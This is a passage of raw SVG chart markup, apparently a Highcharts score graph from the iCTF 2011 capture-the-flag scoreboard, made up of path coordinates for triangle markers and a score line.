stroke="#333" stroke-width="0.000001"></path><path d="M 92.5 231.68 L 96.5 239.68 88.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 91 231.68 L 95 239.68 87 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 89.5 231.68 L 93.5 239.68 85.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 88 231.68 L 92 239.68 84 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 86.5 231.68 L 90.5 239.68 82.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 85 231.68 L 89 239.68 81 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 83.5 231.68 L 87.5 239.68 79.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 82 231.68 L 86 239.68 78 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 80.5 231.68 L 84.5 239.68 76.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 79 231.68 L 83 239.68 75 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 77.5 231.68 L 81.5 239.68 73.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 75.5 231.68 L 79.5 239.68 71.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 74 231.68 L 78 239.68 70 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 72.5 231.68 L 76.5 239.68 68.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 71 231.68 L 75 239.68 67 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 69.5 231.68 L 73.5 239.68 65.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 68 231.68 L 72 239.68 64 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 66.5 231.68 L 70.5 239.68 62.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 65 231.68 L 69 239.68 61 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 63.5 231.68 L 67.5 239.68 59.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 62 231.68 L 66 239.68 58 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 60.5 231.68 L 64.5 239.68 56.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 59 231.68 L 63 239.68 55 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 57.5 231.68 L 61.5 239.68 53.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 56 231.68 L 60 239.68 52 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 54.5 231.68 L 58.5 239.68 50.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 53 231.68 L 57 239.68 49 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 51.5 231.68 L 55.5 239.68 47.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 50 231.68 L 54 239.68 46 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 48 231.68 L 52 239.68 44 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 46.5 231.68 L 50.5 239.68 42.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 45 231.68 L 49 239.68 41 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 43.5 231.68 L 47.5 239.68 39.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 42 231.68 L 46 239.68 38 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 40.5 231.68 L 44.5 239.68 36.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 39 231.68 L 43 239.68 35 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 37.5 231.68 L 41.5 239.68 33.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 36 231.68 L 40 239.68 32 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 34.5 231.68 L 38.5 239.68 30.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 33 231.68 L 37 239.68 29 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 31.5 231.68 L 35.5 239.68 27.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 30 231.68 L 34 239.68 26 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 28.5 231.68 L 32.5 239.68 24.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 27 231.68 L 31 239.68 23 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 25.5 231.68 L 29.5 239.68 21.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 24 231.68 L 28 239.68 20 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 22 231.68 L 26 239.68 18 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 20.5 231.68 L 24.5 239.68 16.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 19 231.68 L 23 239.68 15 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 17.5 231.68 L 21.5 239.68 13.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 16 231.68 L 20 239.68 12 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 14.5 231.68 L 18.5 239.68 10.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 13 231.68 L 17 239.68 9 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 11.5 231.68 L 15.5 239.68 7.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 10 231.68 L 14 239.68 6 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 8.5 231.68 L 12.5 239.68 4.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 7 231.68 L 11 239.68 3 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 5.5 231.68 L 9.5 239.68 1.5 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 4 231.68 L 8 239.68 0 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path></g><g class="highcharts-series" clip-path="url(http://scoreboard.ictf2011.info/score-graph.html#highcharts-1580)" visibility="visible" transform="translate(75,55)"><path d="M 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.8 L 58.92095588235295 236.8 L 60.44898897058824 236.8 L 61.977022058823536 236.8 L 63.505055147058826 236.8 L 65.03308823529412 236.8 L 66.56112132352942 236.8 L 68.08915441176471 236.8 L 69.6171875 236.8 L 71.1452205882353 236.8 L 72.6732536764706 236.8 L 74.20128676470588 236.8 L 75.72931985294119 236.8 L 77.25735294117648 236.8 L 78.78538602941177 236.8 L 80.31341911764706 236.8 L 81.84145220588236 236.8 L 83.36948529411765 236.8 L 84.89751838235294 236.8 L 86.42555147058825 236.8 L 87.95358455882354 236.8 L 89.48161764705883 236.8 L 91.00965073529413 236.8 L 92.53768382352942 236.8 L 94.06571691176471 236.8 L 95.59375 236.8 L 97.1217830882353 236.8 L 98.6498161764706 236.8 L 100.17784926470588 236.8 L 101.70588235294119 236.8 L 103.23391544117648 236.8 L 104.76194852941177 236.8 L 106.28998161764706 236.8 L 107.81801470588236 236.8 L 109.34604779411765 236.8 L 110.87408088235294 236.8 L 112.40211397058825 236.8 L 113.93014705882354 236.8 L 115.45818014705883 236.8 L 116.98621323529413 236.8 L 118.51424632352942 236.4867136 L 120.04227941176471 236.4867136 L 121.5703125 236.4867136 L 123.0983455882353 236.08516 L 124.6263786764706 236.08516 L 126.15441176470588 236.08516 L 127.68244485294119 235.96556415999999 L 129.21047794117646 235.77993664 L 130.73851102941177 235.77993664 L 132.26654411764707 235.77993664 L 133.79457720588235 235.77993664 L 135.32261029411765 235.77993664 L 136.85064338235296 235.77993664 L 138.37867647058823 235.77993664 L 139.90670955882354 235.77993664 L 141.43474264705884 235.77993664 L 142.96277573529412 235.77993664 L 144.49080882352942 235.77993664 L 146.01884191176472 235.77993664 L 147.546875 235.77993664 L 149.0749080882353 235.77993664 L 150.6029411764706 235.77993664 L 152.13097426470588 235.77993664 L 153.6590073529412 235.77993664 L 155.18704044117646 235.77993664 L 156.71507352941177 235.77993664 L 158.24310661764707 235.77993664 L 159.77113970588235 235.77993664 L 161.29917279411765 235.77993664 L 162.82720588235296 235.77993664 L 164.35523897058823 235.77993664 L 165.88327205882354 235.45261984 L 167.41130514705884 235.15567264 L 168.93933823529412 234.31029664 L 170.46737132352942 234.31029664 L 171.99540441176472 234.31029664 L 173.5234375 233.85315423999998 L 175.0514705882353 233.85315423999998 L 176.5795036764706 233.85315423999998 L 178.10753676470588 233.64056704 L 179.6355698529412 233.64056704 L 181.1636029411765 233.16342688 L 182.69163602941177 233.16342688 L 184.21966911764707 233.16342688 L 185.74770220588235 233.16342688 L 187.27573529411765 233.16342688 L 188.80376838235296 233.16342688 L 190.33180147058823 233.16342688 L 191.85983455882354 233.16342688 L 193.38786764705884 233.16342688 L 194.91590073529412 233.16342688 L 196.44393382352942 233.16342688 L 197.97196691176472 233.16342688 L 199.5 233.16342688 L 201.0280330882353 233.16342688 L 202.5560661764706 233.16342688 L 204.08409926470588 233.16342688 L 205.6121323529412 233.16342688 L 207.1401654411765 233.16342688 L 208.66819852941177 233.16342688 L 210.19623161764707 233.16342688 L 211.72426470588235 233.16342688 L 213.25229779411765 232.99335711999998 L 214.78033088235296 232.99335711999998 L 216.30836397058823 232.99335711999998 L 217.83639705882354 232.99335711999998 L 219.36443014705884 232.99335711999998 L 220.89246323529412 232.99335711999998 L 222.42049632352942 232.99335711999998 L 223.94852941176472 232.99335711999998 L 225.4765625 232.99335711999998 L 227.0045955882353 232.99335711999998 L 228.5326286764706 232.99335711999998 L 230.06066176470588 232.99335711999998 L 231.5886948529412 232.99335711999998 L 233.1167279411765 232.99335711999998 L 234.64476102941177 232.99335711999998 L 236.17279411764707 232.99335711999998 L 237.70082720588238 232.99335711999998 L 239.22886029411765 232.99335711999998 L 240.75689338235296 232.99335711999998 L 242.28492647058823 231.88331765333254 L 243.81295955882354 231.88331765333254 L 245.34099264705884 231.88331765333254 L 246.86902573529412 231.35016245333253 L 248.39705882352942 230.57796949333255 L 249.92509191176472 230.57796949333255 L 251.453125 230.57796949333255 L 252.9811580882353 230.57796949333255 L 254.5091911764706 230.57796949333255 L 256.0372242647059 230.57796949333255 L 257.56525735294116 229.79066869333252 L 259.09329044117646 229.79066869333252 L 260.62132352941177 229.79066869333252 L 262.1493566176471 226.4715993813349 L 263.6773897058824 226.18284546133492 L 265.2054227941177 226.18284546133492 L 266.7334558823529 226.18284546133492 L 268.26148897058823 226.18284546133492 L 269.78952205882354 226.18284546133492 L 271.31755514705884 226.18284546133492 L 272.84558823529414 226.18284546133492 L 274.37362132352945 226.18284546133492 L 275.9016544117647 226.18284546133492 L 277.4296875 226.18284546133492 L 278.9577205882353 226.18284546133492 L 280.4857536764706 226.18284546133492 L 282.0137867647059 226.18284546133492 L 283.54181985294116 226.18284546133492 L 285.06985294117646 226.18284546133492 L 286.59788602941177 226.18284546133492 L 288.1259191176471 226.18284546133492 L 289.6539522058824 226.18284546133492 L 291.1819852941177 226.18284546133492 L 292.7100183823529 226.18284546133492 L 294.23805147058823 226.18284546133492 L 295.76608455882354 226.18284546133492 L 297.29411764705884 226.18284546133492 L 298.82215073529414 226.18284546133492 L 300.35018382352945 225.3436854613349 L 301.8782169117647 224.7328930133349 L 303.40625 223.63356558933492 L 304.9342830882353 222.70822420266865 L 306.4623161764706 222.46780116266865 L 307.9903492647059 217.62137185066865 L 309.51838235294116 214.23019378133608 L 311.04641544117646 213.85766002133607 L 312.57444852941177 213.85766002133607 L 314.1024816176471 213.85766002133607 L 315.6305147058824 213.4392344213361 L 317.1585477941177 211.70801922133597 L 318.6865808823529 210.78822171733597 L 320.21461397058823 206.15989467733596 L 321.74264705882354 206.15989467733596 L 323.27068014705884 206.15989467733596 L 324.79871323529414 204.18924507733595 L 326.32674632352945 200.70281499733596 L 327.8547794117647 198.08428059733598 L 329.3828125 194.27795739733597 L 330.9108455882353 192.84856155733598 L 332.4388786764706 191.55279195733598 L 333.9669117647059 190.62483195733597 L 335.4949448529412 189.96075003733597 L 337.02297794117646 189.43029435733598 L 338.55101102941177 189.43029435733598 L 340.0790441176471 189.04156347733598 L 341.6070772058824 188.656881877336 L 343.1351102941177 187.14312603733597 L 344.6631433823529 186.93188859733596 L 346.19117647058823 185.84263227733598 L 347.71920955882354 184.64202075733596 L 349.24724264705884 184.10307579733598 L 350.77527573529414 184.056509077336 L 352.30330882352945 184.056509077336 L 353.8313419117647 184.056509077336 L 355.359375 184.056509077336 L 356.8874080882353 184.056509077336 L 358.4154411764706 184.056509077336 L 359.9434742647059 184.056509077336 L 361.4715073529412 184.056509077336 L 362.99954044117646 184.056509077336 L 364.52757352941177 184.056509077336 L 366.0556066176471 183.89566267733596 L 367.5836397058824 182.08698427733597 L 369.1116727941177 179.46305083733597 L 370.6397058823529 178.09439419733596 L 372.16773897058823 176.30056315733597 L 373.69577205882354 175.09522747733598 L 375.22380514705884 174.26647483733598 L 376.75183823529414 173.595928277336 L 378.27987132352945 173.595928277336 L 379.8079044117647 173.38577064533598 L 381.3359375 173.38577064533598 L 382.8639705882353 173.36823915733595 L 384.3920036764706 172.84311147733598 L 385.9200367647059 172.20678843733594 L 387.4480698529412 170.69409859200272 L 388.97610294117646 168.3879981120027 L 390.50413602941177 166.4769013440027 L 392.0321691176471 166.03602631466944 L 393.5602022058824 165.88442695466946 L 395.0882352941177 165.42724785066943" fill="none" stroke="rgb(0, 0, 0)" stroke-width="5" isShadow="true" stroke-opacity="0.05" transform="translate(1,1)"></path><path d="M 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.8 L 58.92095588235295 236.8 L 60.44898897058824 236.8 L 61.977022058823536 236.8 L 63.505055147058826 236.8 L 65.03308823529412 236.8 L 66.56112132352942 236.8 L 68.08915441176471 236.8 L 69.6171875 236.8 L 71.1452205882353 236.8 L 72.6732536764706 236.8 L 74.20128676470588 236.8 L 75.72931985294119 236.8 L 77.25735294117648 236.8 L 78.78538602941177 236.8 L 80.31341911764706 236.8 L 81.84145220588236 236.8 L 83.36948529411765 236.8 L 84.89751838235294 236.8 L 86.42555147058825 236.8 L 87.95358455882354 236.8 L 89.48161764705883 236.8 L 91.00965073529413 236.8 L 92.53768382352942 236.8 L 94.06571691176471 236.8 L 95.59375 236.8 L 97.1217830882353 236.8 L 98.6498161764706 236.8 L 100.17784926470588 236.8 L 101.70588235294119 236.8 L 103.23391544117648 236.8 L 104.76194852941177 236.8 L 106.28998161764706 236.8 L 107.81801470588236 236.8 L 109.34604779411765 236.8 L 110.87408088235294 236.8 L 112.40211397058825 236.8 L 113.93014705882354 236.8 L 115.45818014705883 236.8 L 116.98621323529413 236.8 L 118.51424632352942 236.4867136 L 120.04227941176471 236.4867136 L 121.5703125 236.4867136 L 123.0983455882353 236.08516 L 124.6263786764706 236.08516 L 126.15441176470588 236.08516 L 127.68244485294119 235.96556415999999 L 129.21047794117646 235.77993664 L 130.73851102941177 235.77993664 L 132.26654411764707 235.77993664 L 133.79457720588235 235.77993664 L 135.32261029411765 235.77993664 L 136.85064338235296 235.77993664 L 138.37867647058823 235.77993664 L 139.90670955882354 235.77993664 L 141.43474264705884 235.77993664 L 142.96277573529412 235.77993664 L 144.49080882352942 235.77993664 L 146.01884191176472 235.77993664 L 147.546875 235.77993664 L 149.0749080882353 235.77993664 L 150.6029411764706 235.77993664 L 152.13097426470588 235.77993664 L 153.6590073529412 235.77993664 L 155.18704044117646 235.77993664 L 156.71507352941177 235.77993664 L 158.24310661764707 235.77993664 L 159.77113970588235 235.77993664 L 161.29917279411765 235.77993664 L 162.82720588235296 235.77993664 L 164.35523897058823 235.77993664 L 165.88327205882354 235.45261984 L 167.41130514705884 235.15567264 L 168.93933823529412 234.31029664 L 170.46737132352942 234.31029664 L 171.99540441176472 234.31029664 L 173.5234375 233.85315423999998 L 175.0514705882353 233.85315423999998 L 176.5795036764706 233.85315423999998 L 178.10753676470588 233.64056704 L 179.6355698529412 233.64056704 L 181.1636029411765 233.16342688 L 182.69163602941177 233.16342688 L 184.21966911764707 233.16342688 L 185.74770220588235 233.16342688 L 187.27573529411765 233.16342688 L 188.80376838235296 233.16342688 L 190.33180147058823 233.16342688 L 191.85983455882354 233.16342688 L 193.38786764705884 233.16342688 L 194.91590073529412 233.16342688 L 196.44393382352942 233.16342688 L 197.97196691176472 233.16342688 L 199.5 233.16342688 L 201.0280330882353 233.16342688 L 202.5560661764706 233.16342688 L 204.08409926470588 233.16342688 L 205.6121323529412 233.16342688 L 207.1401654411765 233.16342688 L 208.66819852941177 233.16342688 L 210.19623161764707 233.16342688 L 211.72426470588235 233.16342688 L 213.25229779411765 232.99335711999998 L 214.78033088235296 232.99335711999998 L 216.30836397058823 232.99335711999998 L 217.83639705882354 232.99335711999998 L 219.36443014705884 232.99335711999998 L 220.89246323529412 232.99335711999998 L 222.42049632352942 232.99335711999998 L 223.94852941176472 232.99335711999998 L 225.4765625 232.99335711999998 L 227.0045955882353 232.99335711999998 L 228.5326286764706 232.99335711999998 L 230.06066176470588 232.99335711999998 L 231.5886948529412 232.99335711999998 L 233.1167279411765 232.99335711999998 L 234.64476102941177 232.99335711999998 L 236.17279411764707 232.99335711999998 L 237.70082720588238 232.99335711999998 L 239.22886029411765 232.99335711999998 L 240.75689338235296 232.99335711999998 L 242.28492647058823 231.88331765333254 L 243.81295955882354 231.88331765333254 L 245.34099264705884 231.88331765333254 L 246.86902573529412 231.35016245333253 L 248.39705882352942 230.57796949333255 L 249.92509191176472 230.57796949333255 L 251.453125 230.57796949333255 L 252.9811580882353 230.57796949333255 L 254.5091911764706 230.57796949333255 L 256.0372242647059 230.57796949333255 L 257.56525735294116 229.79066869333252 L 259.09329044117646 229.79066869333252 L 260.62132352941177 229.79066869333252 L 262.1493566176471 226.4715993813349 L 263.6773897058824 226.18284546133492 L 265.2054227941177 226.18284546133492 L 266.7334558823529 226.18284546133492 L 268.26148897058823 226.18284546133492 L 269.78952205882354 226.18284546133492 L 271.31755514705884 226.18284546133492 L 272.84558823529414 226.18284546133492 L 274.37362132352945 226.18284546133492 L 275.9016544117647 226.18284546133492 L 277.4296875 226.18284546133492 L 278.9577205882353 226.18284546133492 L 280.4857536764706 226.18284546133492 L 282.0137867647059 226.18284546133492 L 283.54181985294116 226.18284546133492 L 285.06985294117646 226.18284546133492 L 286.59788602941177 226.18284546133492 L 288.1259191176471 226.18284546133492 L 289.6539522058824 226.18284546133492 L 291.1819852941177 226.18284546133492 L 292.7100183823529 226.18284546133492 L 294.23805147058823 226.18284546133492 L 295.76608455882354 226.18284546133492 L 297.29411764705884 226.18284546133492 L 298.82215073529414 226.18284546133492 L 300.35018382352945 225.3436854613349 L 301.8782169117647 224.7328930133349 L 303.40625 223.63356558933492 L 304.9342830882353 222.70822420266865 L 306.4623161764706 222.46780116266865 L 307.9903492647059 217.62137185066865 L 309.51838235294116 214.23019378133608 L 311.04641544117646 213.85766002133607 L 312.57444852941177 213.85766002133607 L 314.1024816176471 213.85766002133607 L 315.6305147058824 213.4392344213361 L 317.1585477941177 211.70801922133597 L 318.6865808823529 210.78822171733597 L 320.21461397058823 206.15989467733596 L 321.74264705882354 206.15989467733596 L 323.27068014705884 206.15989467733596 L 324.79871323529414 204.18924507733595 L 326.32674632352945 200.70281499733596 L 327.8547794117647 198.08428059733598 L 329.3828125 194.27795739733597 L 330.9108455882353 192.84856155733598 L 332.4388786764706 191.55279195733598 L 333.9669117647059 190.62483195733597 L 335.4949448529412 189.96075003733597 L 337.02297794117646 189.43029435733598 L 338.55101102941177 189.43029435733598 L 340.0790441176471 189.04156347733598 L 341.6070772058824 188.656881877336 L 343.1351102941177 187.14312603733597 L 344.6631433823529 186.93188859733596 L 346.19117647058823 185.84263227733598 L 347.71920955882354 184.64202075733596 L 349.24724264705884 184.10307579733598 L 350.77527573529414 184.056509077336 L 352.30330882352945 184.056509077336 L 353.8313419117647 184.056509077336 L 355.359375 184.056509077336 L 356.8874080882353 184.056509077336 L 358.4154411764706 184.056509077336 L 359.9434742647059 184.056509077336 L 361.4715073529412 184.056509077336 L 362.99954044117646 184.056509077336 L 364.52757352941177 184.056509077336 L 366.0556066176471 183.89566267733596 L 367.5836397058824 182.08698427733597 L 369.1116727941177 179.46305083733597 L 370.6397058823529 178.09439419733596 L 372.16773897058823 176.30056315733597 L 373.69577205882354 175.09522747733598 L 375.22380514705884 174.26647483733598 L 376.75183823529414 173.595928277336 L 378.27987132352945 173.595928277336 L 379.8079044117647 173.38577064533598 L 381.3359375 173.38577064533598 L 382.8639705882353 173.36823915733595 L 384.3920036764706 172.84311147733598 L 385.9200367647059 172.20678843733594 L 387.4480698529412 170.69409859200272 L 388.97610294117646 168.3879981120027 L 390.50413602941177 166.4769013440027 L 392.0321691176471 166.03602631466944 L 393.5602022058824 165.88442695466946 L 395.0882352941177 165.42724785066943" fill="none" stroke="rgb(0, 0, 0)" stroke-width="3" isShadow="true" stroke-opacity="0.1" transform="translate(1,1)"></path><path d="M 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.8 L 58.92095588235295 236.8 L 60.44898897058824 236.8 L 61.977022058823536 236.8 L 63.505055147058826 236.8 L 65.03308823529412 236.8 L 66.56112132352942 236.8 L 68.08915441176471 236.8 L 69.6171875 236.8 L 71.1452205882353 236.8 L 72.6732536764706 236.8 L 74.20128676470588 236.8 L 75.72931985294119 236.8 L 77.25735294117648 236.8 L 78.78538602941177 236.8 L 80.31341911764706 236.8 L 81.84145220588236 236.8 L 83.36948529411765 236.8 L 84.89751838235294 236.8 L 86.42555147058825 236.8 L 87.95358455882354 236.8 L 89.48161764705883 236.8 L 91.00965073529413 236.8 L 92.53768382352942 236.8 L 94.06571691176471 236.8 L 95.59375 236.8 L 97.1217830882353 236.8 L 98.6498161764706 236.8 L 100.17784926470588 236.8 L 101.70588235294119 236.8 L 103.23391544117648 236.8 L 104.76194852941177 236.8 L 106.28998161764706 236.8 L 107.81801470588236 236.8 L 109.34604779411765 236.8 L 110.87408088235294 236.8 L 112.40211397058825 236.8 L 113.93014705882354 236.8 L 115.45818014705883 236.8 L 116.98621323529413 236.8 L 118.51424632352942 236.4867136 L 120.04227941176471 236.4867136 L 121.5703125 236.4867136 L 123.0983455882353 236.08516 L 124.6263786764706 236.08516 L 126.15441176470588 236.08516 L 127.68244485294119 235.96556415999999 L 129.21047794117646 235.77993664 L 130.73851102941177 235.77993664 L 132.26654411764707 235.77993664 L 133.79457720588235 235.77993664 L 135.32261029411765 235.77993664 L 136.85064338235296 235.77993664 L 138.37867647058823 235.77993664 L 139.90670955882354 235.77993664 L 141.43474264705884 235.77993664 L 142.96277573529412 235.77993664 L 144.49080882352942 235.77993664 L 146.01884191176472 235.77993664 L 147.546875 235.77993664 L 149.0749080882353 235.77993664 L 150.6029411764706 235.77993664 L 152.13097426470588 235.77993664 L 153.6590073529412 235.77993664 L 155.18704044117646 235.77993664 L 156.71507352941177 235.77993664 L 158.24310661764707 235.77993664 L 159.77113970588235 235.77993664 L 161.29917279411765 235.77993664 L 162.82720588235296 235.77993664 L 164.35523897058823 235.77993664 L 165.88327205882354 235.45261984 L 167.41130514705884 235.15567264 L 168.93933823529412 234.31029664 L 170.46737132352942 234.31029664 L 171.99540441176472 234.31029664 L 173.5234375 233.85315423999998 L 175.0514705882353 233.85315423999998 L 176.5795036764706 233.85315423999998 L 178.10753676470588 233.64056704 L 179.6355698529412 233.64056704 L 181.1636029411765 233.16342688 L 182.69163602941177 233.16342688 L 184.21966911764707 233.16342688 L 185.74770220588235 233.16342688 L 187.27573529411765 233.16342688 L 188.80376838235296 233.16342688 L 190.33180147058823 233.16342688 L 191.85983455882354 233.16342688 L 193.38786764705884 233.16342688 L 194.91590073529412 233.16342688 L 196.44393382352942 233.16342688 L 197.97196691176472 233.16342688 L 199.5 233.16342688 L 201.0280330882353 233.16342688 L 202.5560661764706 233.16342688 L 204.08409926470588 233.16342688 L 205.6121323529412 233.16342688 L 207.1401654411765 233.16342688 L 208.66819852941177 233.16342688 L 210.19623161764707 233.16342688 L 211.72426470588235 233.16342688 L 213.25229779411765 232.99335711999998 L 214.78033088235296 232.99335711999998 L 216.30836397058823 232.99335711999998 L 217.83639705882354 232.99335711999998 L 219.36443014705884 232.99335711999998 L 220.89246323529412 232.99335711999998 L 222.42049632352942 232.99335711999998 L 223.94852941176472 232.99335711999998 L 225.4765625 232.99335711999998 L 227.0045955882353 232.99335711999998 L 228.5326286764706 232.99335711999998 L 230.06066176470588 232.99335711999998 L 231.5886948529412 232.99335711999998 L 233.1167279411765 232.99335711999998 L 234.64476102941177 232.99335711999998 L 236.17279411764707 232.99335711999998 L 237.70082720588238 232.99335711999998 L 239.22886029411765 232.99335711999998 L 240.75689338235296 232.99335711999998 L 242.28492647058823 231.88331765333254 L 243.81295955882354 231.88331765333254 L 245.34099264705884 231.88331765333254 L 246.86902573529412 231.35016245333253 L 248.39705882352942 230.57796949333255 L 249.92509191176472 230.57796949333255 L 251.453125 230.57796949333255 L 252.9811580882353 230.57796949333255 L 254.5091911764706 230.57796949333255 L 256.0372242647059 230.57796949333255 L 257.56525735294116 229.79066869333252 L 259.09329044117646 229.79066869333252 L 260.62132352941177 229.79066869333252 L 262.1493566176471 226.4715993813349 L 263.6773897058824 226.18284546133492 L 265.2054227941177 226.18284546133492 L 266.7334558823529 226.18284546133492 L 268.26148897058823 226.18284546133492 L 269.78952205882354 226.18284546133492 L 271.31755514705884 226.18284546133492 L 272.84558823529414 226.18284546133492 L 274.37362132352945 226.18284546133492 L 275.9016544117647 226.18284546133492 L 277.4296875 226.18284546133492 L 278.9577205882353 226.18284546133492 L 280.4857536764706 226.18284546133492 L 282.0137867647059 226.18284546133492 L 283.54181985294116 